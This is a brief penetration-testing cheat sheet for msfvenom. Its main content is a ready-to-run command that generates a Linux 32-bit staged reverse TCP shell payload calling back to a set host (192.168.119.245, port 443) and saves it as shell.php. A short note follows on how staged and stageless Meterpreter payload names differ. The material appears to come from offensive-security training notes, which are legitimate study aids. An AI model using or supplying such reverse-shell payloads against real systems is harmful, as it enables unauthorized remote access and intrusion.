[-]======================================[-]
    msfvenom
[-]======================================[-]

- ---] Quick Commands
======================

# Linux 32bit (Staged) Reverse TCP PHP shell
msfvenom -p linux/x86/shell/reverse_tcp   LHOST=192.168.119.245 LPORT=443 -f raw > shell.php




- ---] Related Commands
======================



- ---] Misc Notes
======================

# Staged Payloads vs Stageless Payloads

windows/meterpreter/reverse_tcp (Staged have forward slash)
windows/meterpreter_reverse_tcp (Stagless is an 'under achiever' and has under_scores)
